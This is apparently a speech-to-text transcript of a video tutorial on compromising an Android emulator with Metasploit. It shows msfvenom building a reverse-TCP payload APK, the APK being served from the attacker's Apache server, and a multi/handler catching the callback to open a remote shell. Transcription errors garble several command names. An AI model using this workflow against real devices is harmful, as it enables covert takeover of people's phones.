Hello everyone, I am Arun Nair. In this tutorial, I will teach you how to hack Android with Metasploit. Okay, so what is Metasploit? Metasploit is an exploitation framework and exploit development kit which is used by both black hat hackers and white hat hackers as well as security researchers. So first of all, I would like you to download Genymotion, which is a free Android emulator. It is available for Mac, Windows as well as Linux. So as I'm using Linux right now, I have installed it on my Linux system. So let's get started. Let me start my Genymotion. So as you can see here, I have already a Google Nexus 5X as my virtual machine. I'm gonna start it. By the time it is starting, I would like to show you what is Metasploit. So Metasploit was created by HD Moore in 2003 and now he is in Rapid 7. So you might be thinking, what is MSF console? MSF console is probably the most popular interface provided by the Metasploit, from which we can access all the functionality of the Metasploit framework at once. So my Android emulator has been started. Let me switch it on. So as you can see, it is MSF console. So for hacking our Android, first let's generate our payload. So I'll be using MSF Venom, and most of you people might have heard about MSF payload or might have used. So it has become old, and in the latest versions of Kali Linux, you won't get MSF payload. Instead, you will get MSF Venom, which is the combination of both MSF payload and MSF encode. So let's get started with MSF Venom. You can type MSF Venom -h to see how to use it. So as you can see, our Android has been started. It seems very big, right? So here is the help of our MSF Venom. Using -p option, we can specify what payload we want to use, and -- payload options to see what are the options available for the payload, or we have to specify in the payload. Using -l, we can list our payloads available, encoders, knobs and all. Using E option, we can encode it, but in here case I am not using any antivirus inside my Android virtual machine, so I don't need to encode it. So let's generate our payload, MSF Venom. So first of all, let me tell you that a payload is a kind of executable which gets executed on the victim machines after our exploit is successful. And exploit is a technique, or you can say exploit is what which takes the advantage of vulnerability present in the system. Okay, so let me generate MSF Venom P Android Metasploit reverse TCP. So in here I will be using Android Metasploit reverse TCP payload. Okay, so let me type payload options to see what are the options we have to specify in this particular payload. Okay, so by that time it is loading, let me tell you about Metasploit. Metasploit is a payload in Metasploit which we can extend during after even we have exploited also. So here are the payload options. So as you can see here, we have to specify L host and L port. By the default it has specified 4444. So let it be the same. As you can see, Android Metasploit, platform Android, Arch, all are specified. So we have to specify only L host. Okay, MSF Venom P Android Metasploit L host 192.168. Let me see what's my IP address. Config. So as you can see, my IP address in this case is 192.168.57.1. Let me put it 0.57.1, and L port, let it be the same 4. And let puts in mal.apk. Okay, mal.apk. So it is generating our payload. By the time, let me start Apache 2 service. because I will be moving, I will be downloading the payload from Android from the web server which is being hosted on the attacker's machine. Okay, service 532 start. Our web server has been started. Let me move the payload to the specific directory from where which the victim can access the malware. Okay, mv mal.apk to var www html. Okay, our payload has been moved successfully. Okay, the next step is we will go to our Android machine, and from here we will open the browser. Oh, sorry. Where is the browser? Here is the browser. Let me type it. 192.168.57.1. Yeah, our Apache is working. And let me type mal.apk. Let me see where has been my payload series. HTML. Let me move mal to web. So here is our malware. So let's start our MSF console multi-handler. We will be listening in our MSF console so that when our payload is successfully executed, it connects back to our Metasploit. Okay, oh sorry, multi-handler. Set payload Android Metasploit TCP. It's taking a bit time. Yeah, it has been set. So we want to see the options. So we have to set lhost here also. Set lhost 192.168.57.1. So our lhost has been successfully set. So what we have to do now? Just type exploit, and our payload is multi-handler is listening. So as we can see, a Metasploit session 1 has been opened because we had earlier clicked on this, and when we click on this, it tried to connect back to us. At that time our MSF console was not listening. So when we started our MSF console, we got a connection from our victim machine. So as you can see, I have successfully, let me type question mark to see what are the commands available. You can see the whole lots of commands. You can Google further to see what are these commands used for. So first I will show some Linux commands. As you know, Android is based on Linux. So print working directory to see where we are, ls to see the listing directories, type shell. So here is the listing of the directory. So I want to stop this tutorial, and I hope you enjoyed it. Thank you for watching this tutorial.